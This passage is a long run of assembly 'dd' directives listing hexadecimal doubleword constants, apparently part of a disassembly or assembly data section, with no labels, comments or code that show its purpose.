dd 5A4329A6h, 0C5F518EEh, 0D64FB57Ch, 26991E89h, 47D049h
dd 7DEDAAD7h, 5819A182h, 9815E6DFh, 6674ECD9h, 6412D2FAh
dd 0BD3129CDh, 82CD576Ch, 76C4BD8Fh, 3AF6C3AEh, 0B1DE4D0h
dd 0ACD2DBD8h, 0B248B251h, 4ABC6C9Ah, 612FD1D9h, 0DE632389h
dd 0D7F7556Fh, 623F3531h
dd 128716C1h, 0A92F2B65h, 2C500291h, 38DF7F6Ah, 0FF97A3E6h
dd 0FE2B9B00h, 306C2018h, 0D9CA07F7h, 2266C8DFh, 4E313B45h
dd 710617EDh, 86070B38h, 246A7D14h, 128089CDh, 8843E1FFh
dd 0D924DC9Dh, 0F244F06Ch, 0FF54F2C9h, 5B291BA9h, 11D40D35h
dd 256241E8h, 1F8EAA36h, 92FE0AF2h, 41115C3Dh, 0CAE6CEEBh
dd 5BAAD251h, 0A8B8BDD6h, 70E50919h, 0A2A11075h, 44199FB3h
dd 0C8B17F6Eh, 0ED849E1Dh, 0AE111911h, 694D651Dh, 321BA473h
dd 57798ADFh, 92E50CFCh, 0FEB32D02h, 0A25699FDh, 100D9F81h
dd 0B7FDB8A2h, 465436D5h, 0CEB73D30h, 63D956C1h, 898EB92Fh
dd 0EAB8A133h, 76D26014h, 6A5451ABh, 8735F886h, 0B3F24390h
dd 3E542157h, 75D3D74Ch, 955345E1h, 0E0C79D39h, 46D27EB9h
dd 4AEE0E5Dh, 8515482Ah, 2095BF81h, 3E830D5Bh, 0FE56FCE3h
dd 2546ED90h, 0A9862735h, 8E17F485h, 0F81A151Bh, 0BC865D46h
dd 4DF67979h, 9FDC2DECh, 8E6803E0h, 9CAA1906h, 0C76A5A4h
dd 1D7822C5h, 2C09D3A6h, 0B46DFF3Ah, 79904B4Ah, 8AB0B5B6h
dd 5BC57206h, 942FD385h, 0C21E9538h, 0FBD24013h, 84E259C4h
dd 0B7AD114h, 92BE49B5h, 5757AA5Bh, 40C8CF7Ch, 58234B07h
dd 0E6B7A17Fh, 7F560E9Fh, 0B5AC1FB8h, 939CB756h, 1D3DF822h
dd 0CEB33EFAh, 11DCE78Dh, 9B579B70h, 7B7A85E5h, 0CB1CA154h
dd 0F743C463h, 938988A6h, 4CD14A89h, 4C5E0F1Eh, 97F7AC6Fh
dd 6AF3ACD6h, 11E5576Dh, 244ECF18h, 71594C25h, 45246899h
dd 6449A03Dh, 0F1F999DEh, 4407EC0h, 0F6C2DE7Dh, 96BB4515h
dd 0A7AAC6CCh, 0F19192FAh, 507349Bh, 0B19E628Ch, 448A90EDh
dd 140546E4h, 7FADBB39h, 0CCD1B55Ah, 0C103B480h, 7A04B934h
dd 351566E9h, 81FD84D8h, 87B4CC21h, 64A7AAFCh, 5E29FA26h
dd 0BFA31E35h, 12C6730h, 0A7704A08h, 2D51F781h, 6BA940B8h
dd 0F7FA4D4Fh, 70A491FCh, 1CD69DFAh, 0AB739D53h, 6D926209h
dd 0B39339A3h, 0CFBDB4D9h, 0FB79B636h, 0D335ABEDh, 7413F52Ah
dd 68D3E7EFh, 1FDBC2ACh, 411352DDh, 0ADD3DFA0h, 4257568h
dd 0DAE8F244h, 606DF7DCh, 52EC1CFh, 5E97A39Ch, 24DB1115h
dd 2A2BBE9Dh, 0F0854C04h, 8A6CE5F0h, 6C1C1F5Ch, 9D182E1Fh
dd 165D83CBh, 11DB1396h, 0B47E10C1h, 0BB4DD764h, 32BAC13Bh
dd 32CE8A86h, 0E83D42EFh, 75E7E345h, 0C44AC4B6h, 3EFDD487h
dd 0E9136BC3h, 98ED63CBh, 0E8705EA3h, 52F3E81Ah, 0C0474A23h
dd 0E32C2EF1h, 6FF65168h, 85C8F1BFh, 71F15B8Ah, 3FF7E2h
dd 80A1E976h, 9349867h, 0FC724ADBh, 0C4522546h, 0D5FAC7D5h
dd 0DE4306B4h, 40CB5967h, 804F2332h, 66004BA2h, 0D4D02A1Ah
dd 173FD462h, 9CE1F53Eh, 0ED3B006Fh, 26B9699Dh, 0DBB25304h
dd 301AA407h, 5890E49Dh, 47E69324h, 0C4D83206h, 72B723F3h
dd 15B84173h, 2098D26h, 6052C335h, 94371579h, 4D2FA4CFh
dd 1A50B98Dh, 66DC2D05h, 0CCE756AEh, 0B2FDCE73h, 0A1B35626h
dd 716FD410h, 0BF6BFD61h, 0A900A176h, 0B2251C07h, 0E00221FCh
dd 0BA780248h, 1E081FDCh, 38553A30h, 4C2F0D62h, 5D1E556Ch
dd 0E07ED5FCh, 5155B67Fh, 50529D93h, 1F019780h, 0A263CBCAh
dd 5CEF4DD1h, 0AA0408C8h, 0D1E3FFFEh, 0FE1F4724h, 450B8188h
dd 8B373F35h, 0D8D6081Ch, 0A05E151Eh, 0D63C2C9Ch, 0BA8AF1B8h
dd 0EEE12E0Fh, 97C8E5FFh, 33775340h, 0F51BDD8Ch, 5475D899h
dd 2C761F5Bh, 0BBA502F1h, 0AB69B236h, 326B5E9Ch, 2BF1CB84h
dd 1B1657D1h, 0CB3AADF5h, 7BDDF41Ah, 0E3744F68h, 5A405E8Bh
dd 92F2488Eh, 0F39EBEDEh, 1303DFEAh, 50B94907h, 0E38EC5FFh
dd 49DD58DEh, 20FAB93h, 0C6E5CF0Eh, 9576B27Dh, 0C46AA12h
dd 0FAB98C4h, 0CB5D4EA5h, 0F170B357h, 0BA5B1E1Ah, 13493A23h
dd 5A6D3C7Ah, 0B552A303h, 117CE344h, 63DD799Bh, 4B372795h
dd 77D640Dh, 0DF4A1EB9h, 0BC5214A0h, 0C630BE08h, 0CFEC94DCh
dd 0AE77828Dh, 0D2AEF9B9h, 17E6D337h, 0FCE34330h, 0D4F0F371h
dd 6BB42486h, 9BD83E63h, 6BE5DD50h, 6D646C73h, 2A6C0DF6h
dd 2C0758EAh, 0D2D2F2D9h, 383B28Bh, 8959BE13h, 77A7B509h
dd 368B7936h, 4D6C15B0h, 0C76E6FA0h, 11BD972Ah, 1B0D000Eh
dd 60C93DF6h, 63E7589h, 0B147827Fh, 0C4AD97A6h, 0F996CCE7h
dd 1DE4E9ADh, 2044935h, 2311736Eh, 0C0F7715Ch, 7FFE8C0Eh
dd 501DD91Eh, 5689741Eh, 0ECE13114h, 0FCA292A8h, 0B2AA36BBh
dd 0D140EDECh, 717CE5C7h, 8DA3BAE1h, 83A9D7E6h, 7556FFE5h
dd 0F9E68512h, 19B7A3C0h, 6C87523Ah, 25BC202Eh, 7A934166h
dd 90A67E56h, 0DFB4D397h, 43AB2D72h, 8275796Dh, 61B00BC2h
dd 81B5DC3Eh, 56317261h, 8E93D1AFh, 0C8A752F1h, 0FA45A035h
dd 0F7F50377h, 0E33DE65Ch, 0BB856054h, 0B4788661h, 2E07E63Ah
dd 0BD47E106h, 0C6C17190h, 4345B72Fh, 56A82D7h, 6C780174h
dd 0AD1863CFh, 1787C0ABh, 4024BF4Ch, 0C0407234h, 0A0F21ECFh
dd 0ED34A232h, 0EA51DEC2h, 6993832h, 69D8E38Bh, 0DF7F1E83h
dd 85750677h, 5512B1A3h, 32BA3065h, 0C390CF8Ch, 9C3B0DF1h
dd 55D77A0Ch, 0DA07F454h, 1C7DFF1Dh, 8F46ED47h, 654E8137h
dd 876CA615h, 28477620h, 0E75A431Eh, 0AAE64ACAh, 0D3515031h
dd 0A6A82D7Fh, 0D6017F51h, 0FA034F52h, 0E8BBD829h, 1AE987E1h
dd 0E2AF2234h, 0C6F46BE9h, 21C3BD21h, 32FA5270h, 0EE67EDB0h
dd 4A9E4138h, 89143875h, 0CB62193Fh, 9C0923B2h, 359CB088h
dd 3E7B32C0h, 80B1F32Fh, 3BDD4A7Fh, 6A3B928Dh, 4D44B5EEh
dd 0CE6D516Ah, 7BEDEC71h, 59F6B6EDh, 1D2A7E60h, 46C0A28h
dd 873536DBh, 0DF3EE499h, 3A82F68Ch, 47E4EC42h, 3F6D9141h
dd 28128CD0h, 0C453405Bh, 6AA47D28h, 4890495Ch, 6A274A51h
dd 0C5205EC2h, 6F2CBB1Ch, 393F5327h, 0C253ED61h, 8E5522CCh
dd 6CF123BBh, 610A0030h, 0E1B4780Eh, 49347C1Bh, 0C22C0C90h
dd 9CA8CCD4h, 498D68F6h, 99D89077h, 0C5724B52h, 90CE7D4Eh
dd 37D7E4B6h, 405D7B66h, 8DB3BE3Fh, 67BF5E32h, 0E0C9671Bh
dd 6BD6B264h, 0A336745Dh, 0E863E143h, 2212D2E2h, 0B863E080h
dd 0CCDE4926h, 8C9F9CA4h, 0FD2E465Bh, 6878D7A0h, 44DC9DF8h
dd 7C20E267h, 92390F34h, 0CB6F13DCh, 0C5DAD4BFh, 0DFF00A12h
dd 451B0366h, 0B9E94AFFh, 69B3D448h, 91134583h, 0AA5E606Dh
dd 0AC4747FCh, 40D77BE1h, 28DC8433h, 2A5A2D04h, 5F322456h
dd 5B1FF0AEh, 0B8D1180Ah, 70D509EEh, 7D192066h, 0B690DC6Bh
dd 25F0AE4h, 4A900C15h, 8908C19h, 7DDCCDADh, 0C579949Ah
dd 342DDB04h, 5323EB3h, 25BA9768h, 163DE716h, 64898676h
dd 233253DBh, 1C351120h, 18D64CCDh, 918F96B9h, 2B1ACE9h
dd 0B0E13E7Ah, 8A5F7950h, 1CAACD40h, 0CEC7317Eh, 0A11C7AEFh
dd 4DB893E1h, 9CAC2728h, 7E8B989Ch, 75D67666h, 0BF581C1Eh
dd 0D438FE5h, 237F405Bh, 63B0541Ah, 0B378013Ah, 8F54BBF8h
dd 0C2850D84h, 8D81846Dh, 380DB5Ch, 9248DFC7h, 21C0070Eh
dd 569FBA7h, 1D0E70E7h, 0C49F0AE0h, 0C5158F7Ch, 0F3EFAFA6h
dd 0DD8EB1C2h, 0CE590CD6h, 424CDA5h, 0A2AB63A8h, 86383B70h
dd 37F9E385h, 15169227h, 83AFC988h, 61147BAh, 6FD2A4FAh
dd 234B6D23h, 493E8265h, 53E74D7Fh, 0B1E72B9Bh, 431D95FBh
dd 0D3B32051h, 25BC3AB9h, 0A667F0D4h, 43E14D11h, 35F9B940h
dd 0FB71F1Ch, 0FD9CCE27h, 448F2D08h, 0F91EB42Ch, 27A27C73h
dd 0BA43D125h, 0C134F616h
dd 0D7E2B08h, 48B4FBD8h, 72896EAAh, 3E51B9BCh, 0C664DAB6h
dd 75991B68h, 6CE0ED66h, 0A11664EFh, 1062AFF0h, 1602319Ch
dd 31FB8A38h, 25646B51h, 8C311E82h, 6CF31A62h, 2EE91226h
dd 91E3E71h, 21E827B5h, 8905291Bh, 72460BAh, 0E212CC9Ah
dd 0F8208372h, 20206DB7h, 0CB2FEB35h, 368FB6C7h, 4AFB4CEBh
dd 984070E6h, 32E9BEAh, 8A7A382Dh, 0CBA36BDBh, 478F97Fh
dd 6375EC65h, 63BFEF2Dh, 6C4E2E1Bh, 0A542CA3Fh, 1923C247h
dd 7628856Bh, 0BB39EB7Dh, 5345167Dh, 98396F6Ch, 0EF158665h
dd 348C5279h, 0D1D9E329h, 44D3C0A0h, 0B4D3F531h, 3BE02C45h
dd 876E58B7h, 0C697B3F8h, 0B401CC6h, 0BEFAE7BFh, 851F7DBBh
dd 0EC2C81E4h, 67C21918h, 4A36ADEh, 0C9A8CF7Dh, 3969E9D9h
dd 81F5212Ch, 3A972863h, 0DB65E470h, 3F8A106Fh, 0ACC01C1Ch
dd 0BB6C6486h, 7673920Dh, 70B180C5h, 15836D29h, 0C44F8D78h
dd 5C31DE3Ch, 53C42F26h, 6F40EEF7h, 0C2A2525Eh, 0E428C6C8h
dd 60329BFFh, 0B3266D52h, 7E516BB9h, 29FBA1CFh, 666F5AACh
dd 0A4BB3EDEh, 0B0542665h, 64991B17h, 7FAC4481h, 9E486B3Ah
dd 509ABF76h, 28EC3D64h, 939A2D8Ah, 880893ABh, 0B8F039C7h
dd 547DB8D0h, 0CE85C227h, 8EC4706Dh, 7F547F8Dh, 0BDAD8CD7h
dd 10CEF809h, 0FE88CE81h, 11EC87ADh, 6C1B970Fh, 480E80A6h
dd 0CC0F75A6h, 7E0322C8h, 0E3AD6BFCh, 49218482h, 49DE07BAh
dd 0D7B2A293h, 0D3C0FE67h, 18A81D5Ch, 11C6546h, 0C2862ED1h
dd 7910E0CFh, 51A919EDh, 250177F2h, 8C252F43h, 0AC21C96Ch
dd 0FBBBDB9Eh, 58A054F5h, 59D1869Ah, 36D4A63Bh, 0D37B4098h
dd 9CB5E0DEh, 0DF63409Eh, 1B671C78h, 257A5AEBh, 0D79C54D0h
dd 0BA8B0A91h, 7C985388h, 651A164Ah, 0D416A076h, 0C7651AAh
dd 9D44C5B0h, 0F72C0D99h, 0B54157B9h, 0ACF8DBDBh, 0D22159E9h
dd 505A2BC4h, 5E2922B0h, 4BCA530Bh, 9DCF7FCCh, 0B61F2200h
dd 5D440D95h, 31C7AC87h, 354A17F0h, 44A69A26h, 596AF184h
dd 88C69A53h, 92E51EAFh, 2DD1033Ch, 8E59663Dh, 0B393FE08h
dd 86226FECh, 542673DBh, 30F37345h, 0CD2526E8h, 7671DBB1h
dd 554EACA4h, 1763F34Dh, 0AC69761Fh, 10E3F00Fh, 0A5CC0B08h
dd 9787EF55h, 468AFC3Bh, 931AB218h, 976C3659h, 0B3FFACD2h
dd 4EEC9A9Eh, 412C05BAh, 0A4C740FDh, 0A70E37F5h, 0E7256D8Eh
dd 4481AAB4h, 8A2E3CBFh, 0BE20BE4h, 0A088224Ch, 6CA55E01h
dd 1264E446h, 31F346FBh, 0FAFA6039h, 327DCA27h, 6A06DD13h
dd 0BF1827D7h, 185DA482h, 89013D8h, 0C9C08513h, 0F8956FF0h
dd 0E3DBB8A0h, 8D886394h, 45E075CEh, 5380B732h, 745826F9h
dd 0B97202C3h, 0BD7D7A0Fh, 91C6E6BFh, 43A25ADAh, 292A161Fh
dd 819DA181h, 7CD24A39h, 1A446723h, 28BCAA71h, 6A83ED10h
dd 0CBA10CA1h, 89BB8152h, 958566B8h, 9682245Dh, 1A7F272h
dd 0B15DA91Fh, 0CA69B45Dh, 6DA0EB01h, 124C411Ah, 4E7CB995h
dd 0E424928Ah, 0E07463BCh, 0C3E21876h, 0D487DEFFh, 1DB261E8h
dd 0C4866104h, 0E2392D4Ch, 3A75E566h, 0CA9FB541h, 0F8E79B4Ah
dd 0A0EC8C97h, 1A90A723h, 23A5F7CBh, 3DC9B578h, 52F08786h
dd 58EAA6E1h, 53CBCDDCh, 0B56E25C1h, 8017D4DCh, 0B9A1548Fh
dd 98903CC1h, 0A45CDD18h, 3781AA0h, 89A2D4E2h, 0B5E6FFBEh
dd 76CC0AEAh, 86795C15h, 3B45C247h, 13F7CC17h, 3EE75A0Fh
dd 0E8BC63B1h, 89AB8881h, 5A9F7138h, 53EF9566h, 29E53733h
dd 0ABFCD4B7h, 1620071Ah, 6D7E96DBh, 43094787h, 9957045Ch
dd 58E6167Fh, 458F4099h, 6CC068E1h, 2C4D6F94h, 756117B5h
dd 748849ADh, 5253D62Dh, 3EC26A4Fh, 0FFF81745h, 8FABE574h
dd 4FE722EFh, 22A9B49Ah, 0BA24628Eh, 0A27ECCE9h, 15524B21h
dd 60C86245h, 5A2C5E6h, 385573FBh, 0F82334ABh, 0E589DADAh
dd 36091F0h, 0A12A9463h, 97622BF7h, 0FA2C5E31h, 0C2289B0h
dd 530A01A9h, 608AB7E0h, 8C9CA1FFh, 0E5E337ECh, 58F26078h
dd 75FCF39h, 5B8AF86h, 35025C20h, 3FAD3C62h, 9965A3E3h
dd 0E996C47Ch, 0D2FF7F0Bh, 0AA846DA6h, 21008414h, 0F534E191h
dd 0D2A1F7F8h, 61C4D0EDh, 0CFDB4C1Bh, 0BDAA6A77h, 9B32605Dh
dd 299C48BFh, 6D5129CEh, 9334B1F3h, 0A1FFA5E1h, 1CE2B9C4h
dd 43831016h, 0DBAF4BFBh, 555D8F82h, 0FFC10B34h, 246DADB7h
dd 0BD5E69C8h, 89330CD5h, 0CA354F16h, 0F9DBD03Dh, 0E6FBD6B3h
dd 5BAFFA87h, 0CBC13EFBh, 0A41FCB19h, 4C48A36Bh, 80B03F7Dh
dd 0A6E04901h, 9A8371FBh, 0C2E84DB9h, 0AAFB435Ah, 9006C3F5h
dd 0D149797Ch, 0A103D7D5h, 0E26B30C6h, 159CB00h, 0DF523FA6h
dd 0F2AAFB89h, 18CD7C1Ah, 7040BFECh, 4B985A2Eh, 19E76F68h
dd 5BF07661h, 8DC120ADh, 2B8C951Fh, 0B039E8AEh, 0CE115886h
dd 42993D16h, 0B2E8E557h, 0C7BB8BDDh, 56F86FB5h, 0F112A9F1h
dd 32347CEAh, 35EE398Dh, 0B5734A8Fh, 0BCC193FBh, 38B8DBB7h
dd 302ADBA4h, 65A91638h, 0A3B59FACh, 0C8D4F785h, 453607F0h
dd 0E3E6CB64h, 5CAC5884h, 0EA7F0168h, 0B3CA47BBh, 255D0BB0h
dd 8DCDDD15h, 5821BA67h, 0D171954Fh, 6AC0FDB8h, 874F15A2h
dd 858FCC55h, 0B6638619h, 852D1F60h, 1427AC9Ch, 38137B07h
dd 248F4E12h, 941B8316h, 95A35C2Bh, 0CC04BCECh, 86568BC8h
dd 5F92C651h, 23BC5AC6h, 0A637F066h, 370DEA5Ah, 0B6EAF40Dh
dd 35FADCB1h, 3B315FF6h, 0D959C694h, 470A6B88h, 54AB7DE9h
dd 6B4B9F61h, 0B64C9F19h, 58E1999Fh, 6A0F5643h, 86602B6Ch
dd 7DFBFA77h, 0D510E9Ah, 5243B78Bh, 4B72ED46h, 340BED72h
dd 445B63A1h, 0C846D7ACh, 96A686F0h, 77488D2Ch, 6AA42568h
dd 0E3B4F242h, 5B892CDh, 915C623Dh, 94B0CEB8h, 0B37E8075h
dd 8785E2F7h, 0CA7A08D4h, 0BFE1CC7h, 4BA961BFh, 1FE4C66Bh
dd 6A749BC7h, 32824DBDh, 38C162C1h, 57EB8605h, 81DCCE71h
dd 0ED19F5A9h, 608CFBD8h, 77BA0615h, 0D9908AA0h, 0C1418845h
dd 5A7FA1B9h, 87ED1B33h, 0A4B0C605h, 6878152Ch, 0BAAE85B0h
dd 63F4F925h, 1C18C806h, 4A024328h, 4D67D2CBh, 6CBACFCFh
dd 618802ACh, 4ADEE1C8h, 0DE7806B2h, 14D64F55h, 5964D113h
dd 0A0631711h, 0BA4DC70Bh, 0D3F54060h, 0D729BE10h, 5CEE5DC5h
dd 1F493F8h, 0FC84F913h, 0D161119Dh, 4E7C3BE0h, 4BFC7F22h
dd 921F4D2Bh, 0BFB55C1Eh, 0F5963C86h, 0BDFFB294h, 0C31491Dh
dd 347154BDh, 3C243620h, 2E7A3922h, 54E02380h, 0C4ACE246h
dd 13DE8F33h, 315CA75Ah, 480E1A1Fh, 0F9DC4603h, 0AB572C74h
dd 29964F9Ch, 0CE853652h, 828814h, 35C68D3Dh, 0A86519EBh
dd 41C8BAB0h, 0EEB755E1h, 5F07DA9h, 0F20355CBh, 81B9000h
dd 0EE035C78h, 0A7625445h, 0AF0CBEB6h, 33603020h, 83CD77BAh
dd 18A02E02h, 5D8DF64h, 0DB50984Ah, 0A2185289h, 3F4E2229h
dd 0A620F2BFh, 8980047Eh, 0DFAE5A9Bh, 2C0F6993h, 0CECB323Eh
dd 9795CC31h, 59649F0Ch, 84F8A66Ch, 72C9E53h, 0C265B5E4h
dd 738DFB4Bh, 0CBECB8A3h, 0AA872F49h, 8889632Ch, 95D0794Ah
dd 448EF2D9h, 1710FB87h, 10B119BAh, 0D0343DABh, 187295FBh
dd 0AFCC160Ch, 83DF371Fh, 31F235AEh, 0ED551FBDh, 3E7F5F6Eh
dd 249F2617h, 0ADC1C22Fh, 0CC4BF9B3h, 8B81ED22h, 936CC7D0h
dd 0CEF2429Fh, 4E640069h, 0E2476FACh, 0CA881A8Fh, 934C5F89h
dd 1C9DAE0h, 0F58C21D1h, 0C132561Fh, 0CDEB9382h, 0E0FCAB8Ch
dd 52CDBCCBh, 6657C616h
dd 7BB15FCCh, 699D024Bh, 0F84CFEDCh, 28EAC9Dh, 351D695Eh
dd 0AFF8E3BEh, 259701B8h, 0CC4C2E0Dh, 8D12BDAh, 65694E59h
dd 0F3563480h, 7DCECA5Dh, 3E39C687h, 0D61D232Ah, 1BE50AE1h
dd 1EF8C5F0h, 15B63693h, 7079D293h, 243D6649h, 9069FDDDh
dd 0E3080716h, 291E70BDh, 2BD66784h, 0CA04070Ah, 3D05DF0Bh
dd 7D43A444h, 9ED57ED2h, 637EB998h, 0C2704FC4h, 50E3D491h
dd 998D2214h, 0D0FAEC8Fh, 24656D1Ch, 13F19DDAh, 0D8C06FB0h
dd 0AE6BF905h, 2B124C7Bh, 0F1452C89h, 0CD9F80ADh, 45AE5F8Eh
dd 0E4737711h, 559A89D1h, 7D8334A1h, 5EC14176h, 0C57AB91h
dd 0D3419882h, 7028959Bh, 3CBD122Dh, 29B76C37h, 5766090Ah
dd 75D0234Ah, 6EB75F83h, 0F729D6Bh, 3A8E012Eh, 61012D76h
dd 0E49A6DC2h, 5F7607C3h, 0EB9957DAh, 4DBA3DA4h, 1C9C2F83h
dd 384E0ECBh, 7B453B6Fh, 5A6730C5h, 3D0E13D3h, 6CDE2231h
dd 0CA242D32h, 0BD8A1BB9h, 43DF3EEDh, 60620D04h, 2A0BF975h
dd 4E984A3Ah, 0ADA7341Ch, 9050FAEh, 0A39E6C72h, 8C12F1A6h
dd 14D012A5h, 268B8D6Ah, 0E61D89F4h, 0A12C9D6Ch, 0F19A4407h
dd 6761F7BEh, 608554ACh, 0DABB8A9Eh, 0C76AEC8Ch, 2A82B5BCh
dd 39A139B8h, 6801F95h, 33D492BDh, 0AD53EAC5h, 26FDF5B9h
dd 476A5244h, 6608C504h, 0E4BFE75Eh, 8EA53F4h, 39DCB040h
dd 0DD496FE4h, 0F71A73FBh, 988E7FACh, 0F489233Eh, 46D7F733h
dd 722DCD7Ch, 5E7A38A1h, 254FDFB6h, 5F8368FDh, 11C8A402h
dd 470CE60Dh, 0E446EF39h, 90D97330h, 519A4571h, 0F7CD4A3Fh
dd 77E41689h, 0AA4DF412h, 5B8986B2h, 63D856C8h, 0CD090311h
dd 99A5A73Bh, 173C3CC2h, 0DE167AAFh, 41B41A9Ah, 337E81B6h
dd 6078CD74h, 0DC017FB7h, 4AF8F0C5h, 0A87B9F84h, 0A8527136h
dd 39190F15h, 0D2014309h, 0EDB9403Fh, 6651554Ch, 0AA0D3C03h
dd 66B3BD64h, 0DBEE8B3Ch, 0D8C608EFh, 0C0952865h, 0A40DC4ABh
dd 8A79FBh, 64C42E91h, 2B8142FBh, 5EBB2070h, 4E6E7E9h
dd 1ECF4824h, 628B23E0h, 1E561E81h, 0F99A2D15h, 2EC047C3h
dd 6FD04017h, 7634CB8Dh, 0A27206CAh, 0BE119830h, 2D665D9Ch
dd 9603051h, 0BE6505CCh, 3F701FFEh, 0DBEDEFB4h, 0D82F9A13h
dd 7537A88Bh, 60B7A7B4h, 0A6A2DA5Fh, 0B1DC46FFh, 0D49B54D9h
dd 31AFC711h, 0D9276C3Eh, 269BFDA8h, 0D20C3D2Ch, 53F41B60h
dd 555956ACh, 0EA0E849Dh, 2934CD81h, 0C9340E36h, 0C938B39Ch
dd 38BCB95Eh, 0CCADBA20h, 15AD393Fh, 39A0BCF7h, 0D53EE762h
dd 0BE0A2BF1h, 3FC9B01Eh, 229938E0h, 0ABD3FB28h, 0DCA5F5D2h
dd 0BF50EEFDh, 0B5F11B24h, 0B2BD971h, 97041A59h, 141D92E4h
dd 0A7FF7FEh, 5EC311Ah, 1DE0210Fh, 0C6EC2EFDh, 0A665879Ah
dd 0A039E914h, 923AD145h, 0F86DF8BCh, 53C94870h, 245312D3h
dd 90B255FAh, 74F4E52Bh, 0F4547A77h, 0BF856352h, 738ED1AFh
dd 159FC34Ch, 6C16DFB9h, 63B675EFh, 55FECABCh, 18B27240h
dd 5C964F64h, 0EE18CFD5h, 0D9FB946Dh, 0B11E6790h, 0D6275CAAh
dd 1B5B8B81h, 0F67D7387h, 4B875886h, 0ADF9566Dh, 6666B02Dh
dd 79A239E6h, 889A70FCh, 0F92E1DAFh, 4A0B3BADh, 0DD2CEB47h
dd 0D3C441FBh, 59B0EF6Eh, 0C2D3F945h, 5CCEA581h, 0CC824DDEh
dd 1D220802h, 34391E5h, 80E73BEDh, 0E38B5B52h, 0EEC914DAh
dd 537BDAF9h, 1477A848h, 0CE701BD5h, 0D8244229h, 0D643DAB1h
dd 0A36A287Ah, 7822CD8Ah, 0EE830A53h, 150E70CEh, 8EF4636h
dd 0C5F3D641h, 66DBAA23h, 83EDC1E8h, 0E1B26133h, 73B19199h
dd 752457E5h, 0BB18D121h, 0ADA54DD6h, 0B0981AB9h, 29625BECh
dd 9EE0EFCDh, 0F2054A0Ch, 0F796C2EAh, 5282B0B5h, 0A1E51A58h
dd 0E6616BD0h, 169468E6h, 0FE9A64E7h, 70C0C814h, 50F76938h
dd 67A91B30h, 0CA82970Ah, 555DD9D5h, 75A290C8h, 5EFCFD16h
dd 3B1EC9h, 0D7C093D0h, 0BEFCA7BCh, 50D68C31h, 0A66F63Ch
dd 0F9461AFh, 3EDF91BDh, 0F94CB60Ah, 3CB87116h, 5F6A7C61h
dd 0C9E01916h, 8C07AF9Bh, 55B43F38h, 0ACDEA866h, 54176D93h
dd 435054Fh, 502F644Fh, 86E08B7Bh, 139F0645h, 6F85E2D5h
dd 81974h, 29F18296h, 6F70798Eh, 0FFA66E6Bh, 0F11F8EA1h
dd 6612355Eh, 0F447D6C6h, 0A6A12CCFh, 716479E5h, 0BAB9F724h
dd 0BF81F26Ah, 0A02B14B4h, 8B118192h, 0A9F50649h, 0C7261AF3h
dd 9DBAA41h, 0FDE277FAh, 265F694Ah, 0F5E90377h, 5C7B5FB9h
dd 50ACD5AFh, 0A537D134h, 31EA64Eh, 8C9D723Fh, 6435FE93h
dd 0CDD830E8h, 8254420Ah, 2150BDD1h, 9E99C410h, 9CFC1D0h
dd 0A8D0CF22h, 4F458F3Ch, 0CBD852BAh, 0E9353ABFh, 804F9AE0h
dd 0DBEF4544h, 9CC88277h, 24169926h, 871791E5h, 0FFE03697h
dd 5AD99B4Eh, 3F58A98h, 3F71BC95h, 0DF533FDFh, 0DAC81968h
dd 0D2E11EBDh, 52D2529Ch, 0EC6AEBA2h, 0C600FDEh, 82D63552h
dd 90980EABh, 0C33BECE5h, 0BAAE6773h, 6FAEE3C3h, 2F69F55Fh
dd 0F44906E6h, 0CE5AF9CEh, 345D4D88h, 8C06944h, 8FEA1FE0h
dd 49DA0F50h, 0C9876BE3h, 91E358Bh, 85F3DE0h, 0AF44B6D5h
dd 4AD9C3Fh, 3204B81Ch, 503549E6h, 9E6A0136h, 3E9FA10Bh
dd 2848A38Bh, 748F0878h, 7B1F489Dh, 2A678832h, 0D03EF4C8h
dd 479E88ABh, 0C9BEB6C6h, 0C61A7E0Fh, 205A8355h, 16301B61h
dd 0BAEFEA68h, 260ECE52h, 913F8A8Eh, 6E27CC7h, 0B01B7487h
dd 411BFA69h, 427D69Dh, 653AB096h, 4B3D598h, 0FE95823Ch
dd 0F262997Bh, 7F05EFC0h, 2E755C60h, 647CA55h, 1691E94Ch
dd 0D2EE832Fh, 636F28E6h, 27842241h, 335533EAh, 77C69FE6h
dd 44D77126h, 986FA09Dh, 11AC58F3h, 0AA41179Fh, 0F95D1108h
dd 52E169D4h, 0EF0128DFh, 120E9ED3h, 0EB234062h, 431799ECh
dd 0CD748E1Ah, 0C8462C92h, 83B75DF6h, 0D65D7D3h, 8DCC1219h
dd 95B92657h, 0CC19483Ch, 7593D49Bh, 441669E0h, 0C9B94F9Bh
dd 0A93C1408h, 3DF0EB31h, 858FA6BEh, 0B64A5300h, 170CEE27h
dd 0C5875420h, 373172C8h, 46E46FEFh, 0F964DE8Eh, 7E19BF97h
dd 7336CC9Ah, 0BDDD38Ah, 51DBFFD9h, 0E3CCA96Fh, 835E3E3Ch
dd 5BCECF3h, 10FAC0A9h, 0C0D25FC8h, 4B8834C6h, 0EC592CD0h
dd 90E21F8h, 0E8260156h, 973999E7h, 35E5126Dh, 3A3C4A08h
dd 0CD9E5E1h, 469657B8h, 0FDB3FBF8h, 41B7B8B5h, 3F643980h
dd 0A3556B4Ah, 0C5664AB2h, 0DE1AF8F1h, 0F74B7CBBh, 0E968FEFDh
dd 0CADBFAF5h, 3FCFDEC7h, 4DDF5466h, 75906EBAh, 0B7AA5BCFh
dd 0C0B1ACA2h, 15A2E109h, 97D529Bh, 674FA5C7h, 1F530897h
dd 0EF344B37h, 74EB4381h, 0B57AABFCh, 971C36Eh, 0F48A64AEh
dd 0E529EE9Ah, 9CF1E81h, 2FB6230Eh, 0BF381D06h, 96403003h
dd 7E132825h, 0C2DF8B66h, 3A6B95D4h, 966410E0h, 9FC39374h
dd 46CF12A1h, 0E2D36A0Fh, 93591094h, 0B4F0D87Eh, 0D074F838h
dd 863FFA4Bh, 3A12F96h, 6B1F876Ah, 77F545D9h, 5AD52062h
dd 0CC753E27h, 0A193B0CDh, 2376D290h, 948B7F6Ch, 0D0526C9h
dd 1F56A37Ah, 4724D283h, 4C6B6DCDh, 43E0594Ah, 1ADED603h
dd 482C55AFh, 260AFB32h, 299F5AFEh, 99E8AAFEh, 767B575Dh
dd 260F6140h, 1F9A3730h, 91FC51D1h, 54F93B21h, 6A85781Bh
dd 0E4FD589Bh, 450DF771h, 0E72BD87Eh, 3A797E46h, 42876F80h
dd 26FCF856h, 9F95F9C4h, 0CB012F93h, 0A927BC27h, 0B9E93A68h
dd 12E2C102h, 0BEB49108h, 1131BEB4h, 88F1E3Ch, 5347142Bh
dd 2ECE37FCh, 7CC213D4h
